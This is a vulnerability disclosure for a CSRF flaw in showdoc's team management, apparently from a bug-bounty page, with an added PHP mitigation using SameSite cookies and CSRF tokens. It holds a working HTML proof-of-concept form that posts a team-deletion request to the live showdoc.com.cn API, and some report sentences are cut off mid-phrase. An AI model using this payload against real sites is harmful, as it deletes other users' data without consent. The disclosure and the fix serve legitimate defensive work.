Cross-Site Request Forgery (CSRF) in star7th/showdoc
Valid
Nov 21st 2021
You set the strict flag only for one of your cookies, named cookie_token, but in Team management an attacker can still delete or add teams with a CSRF vulnerability, as the cookie with name PHPSESSID doesn't have
Proof of Concept
38046 with the
2. Open poc.html and click on the submit button.
3. After that, the team with id 38046 or your replaced team id will be deleted.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
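A server-side mitigation for the issue reported above, as an added example (not part of the original report and not showdoc's own code): the PHP session cookie gets SameSite=Strict and every state-changing POST must carry a per-session CSRF token. It assumes the "strict flag" in the report is the SameSite=Strict cookie attribute; the csrf_token field, the X-CSRF-Token header and the handler at the bottom are hypothetical names.

```php
<?php
declare(strict_types=1);

// Cookie attributes must be set before session_start().
// The array form, including 'samesite', requires PHP >= 7.3.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,      // send PHPSESSID over HTTPS only
    'httponly' => true,      // not readable from JavaScript
    'samesite' => 'Strict',  // not attached to cross-site requests
]);
session_start();

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject the request unless it carries the session's token.
// SameSite alone depends on browser support, so the token is checked as well.
function require_csrf_token(): void
{
    $sent = $_POST['csrf_token'] ?? ($_SERVER['HTTP_X_CSRF_TOKEN'] ?? '');
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
}

// Hypothetical handler for a state-changing action such as team deletion.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    require_csrf_token();
    $teamId = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
    if ($teamId === false || $teamId === null) {
        http_response_code(400);
        exit('Invalid team id');
    }
    // The application's own authorization check and delete call go here.
    echo 'Request accepted for team ' . $teamId;
}
```

A cross-site form post like the one in the proof of concept arrives without the session cookie and without the token, so it is rejected with 403 before any team is touched.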